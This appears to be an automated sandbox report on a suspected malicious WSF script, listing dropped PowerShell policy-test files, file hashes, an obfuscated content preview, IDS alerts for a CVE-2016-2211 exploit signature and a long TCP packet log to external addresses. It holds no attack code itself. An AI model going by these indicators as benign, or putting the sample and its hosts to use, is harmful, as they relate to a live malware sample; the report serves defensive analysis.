                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzech3tv.thg.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw1pjods.pbm.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqsumdwf.hnl.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:Unicode text, UTF-8 text, with very long lines (7404), with CRLF line terminators
                                                                                                                          Entropy (8bit):5.050656284094486
                                                                                                                          TrID:
                                                                                                                            File name:FmmYUD4pt7.wsf
                                                                                                                            File size:93'617 bytes
                                                                                                                            MD5:bba52d25f15d6fdad3016dd5943c794c
                                                                                                                            SHA1:c358060b940da3c3c4bf636181ecaf0f9eccced5
                                                                                                                            SHA256:d1fccc8cfb43626be51e01591ab70748db228b5d41cf9fe6a75888135fdae6b4
                                                                                                                            SHA512:82ae0824df925cebb9756cf038ec74a941f2fa735bbf3bf772bc18224703d864b65dd24b3f108221ebac2f6b3fdab377e46b429a43468bb18f23aeb4357ddf1a
                                                                                                                            SSDEEP:1536:N44444444444044444444444h444444444440QIrD44444444444t4444444444X:ma
                                                                                                                            TLSH:80933BD870CE0791CEE4E55865EDFD93C42A81A71B3B2D07967DAF489B6F2FC800644A
                                                                                                                            File Content Preview: ,U HU,, D,, ,I P AP,, F G,B,, ,,OA, A, P I,, NOLRW, T,,SKP L,IYG,,, ,,,VY, ,,P, ,, ,,,YU ,P,L,V,,,K,,, FW , , ,QO,,,KY ,GI,, ZHN, T, BCX , , ,,N,,,W EEHW J Q,P, , A ,,,,SN ,UZM,,LLM, ,MR,S ,NA,L,,,,J ,,,, P, , , , D ,,EWWBB RR

                                                                                                                            File Icon

                                                                                                                            Icon Hash:68d69b8f86ab9a86

                                                                                                                            Network Behavior

                                                                                                                            Suricata IDS Alerts

                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2024-11-06T17:32:17.745477+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.949803TCP
                                                                                                                            2024-11-06T17:32:55.915062+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.949976TCP

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 6, 2024 17:32:00.837385893 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:00.837419987 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:00.837486982 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:00.851994038 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:00.852036953 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:01.742038965 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:01.742197037 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:01.979866982 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:01.979911089 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:01.980294943 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:01.980351925 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:01.993256092 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:02.035340071 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.535100937 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.535135031 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.535150051 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.535289049 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:02.535322905 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.535348892 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:02.535373926 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:02.658730984 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.658780098 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.658875942 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:02.658906937 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.658926964 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:02.658945084 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:02.782242060 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.782269001 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.782308102 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.782403946 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:02.782401085 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:02.782444954 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:02.782454014 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:02.783049107 CET49725443192.168.2.9185.166.143.49
                                                                                                                            Nov 6, 2024 17:32:02.783071995 CET44349725185.166.143.49192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:10.734540939 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:10.734569073 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:10.734698057 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:10.743593931 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:10.743613005 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:11.649183989 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:11.649310112 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:11.651238918 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:11.651253939 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:11.651546955 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:11.658040047 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:11.703336954 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.001955986 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.016288042 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.016323090 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.016362906 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.016382933 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.016422033 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.019903898 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.027946949 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.027981997 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.027995110 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.028004885 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.028043032 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.035743952 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.043720961 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.043776989 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.043791056 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.087996006 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.121416092 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.133339882 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.133398056 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.133418083 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.136847973 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.136897087 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.136917114 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.144998074 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.145073891 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.145102024 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.152940035 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.152988911 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.153007984 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.197350025 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.202541113 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.244292021 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.244318962 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.250952005 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.251035929 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.251060963 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.255075932 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.255142927 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.255161047 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.262176037 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.262255907 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.262283087 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.269666910 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.269718885 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.269757986 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.269788980 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.269884109 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.272156000 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.322412014 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.322448015 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.369276047 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.369311094 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.398701906 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.398746014 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.398772955 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.398833990 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.398858070 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.398905039 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.398916960 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.398961067 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.398972988 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.399086952 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.399156094 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.399168015 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.447370052 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.471282005 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.471292019 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.471415997 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.516540051 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.516570091 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.516724110 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.516993046 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.517000914 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.517066002 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.553397894 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.553406954 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.553512096 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.632477999 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.632493973 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.632530928 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.632565975 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.632580996 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.632601976 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.632630110 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.633415937 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.633424997 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.633481979 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.669584990 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.669651985 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.669668913 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.669687033 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.669708967 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.713031054 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.749568939 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.749583960 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.749723911 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.749959946 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.749967098 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.750034094 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.786467075 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.786475897 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.786550045 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.786571980 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.786593914 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.786601067 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.786645889 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.867003918 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.867100954 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.867135048 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.867187977 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.867187977 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.867208958 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.903642893 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.903704882 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.903713942 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.903779984 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.904191017 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.904253006 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.983861923 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.984004974 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:12.984257936 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:12.984339952 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.020493984 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.020653963 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.020698071 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.020760059 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.020792007 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.020883083 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.100739002 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.100807905 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.101124048 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.101217985 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.101470947 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.101553917 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.137645006 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.137764931 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.138048887 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.138101101 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.218297005 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.218398094 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.218660116 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.218698025 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.218718052 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.218730927 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.218744993 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.254379988 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.254476070 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.254493952 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.254544020 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.254885912 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.254949093 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.335139036 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.335232973 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.335355043 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.335407019 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.335761070 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.335809946 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.336638927 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.336690903 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.398530960 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.398580074 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.398652077 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.398689985 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.398709059 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.398747921 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.452685118 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.452816010 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.515678883 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.515702963 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.515830994 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.515846968 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.515891075 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.570221901 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.570244074 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.570473909 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.570600033 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.570697069 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.686644077 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.686661959 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.686949015 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.686964035 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.687093973 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.749644041 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.749669075 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.749718904 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.749732018 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.749757051 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.749773026 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.804126978 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.804151058 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.804366112 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.804378033 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.804419994 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.866920948 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.866940975 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.867000103 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.867014885 CET4434977784.32.84.136192.168.2.9
                                                                                                                            Nov 6, 2024 17:32:13.867029905 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.867052078 CET49777443192.168.2.984.32.84.136
                                                                                                                            Nov 6, 2024 17:32:13.921688080 CET4434977784.32.84.136192.168.2.9
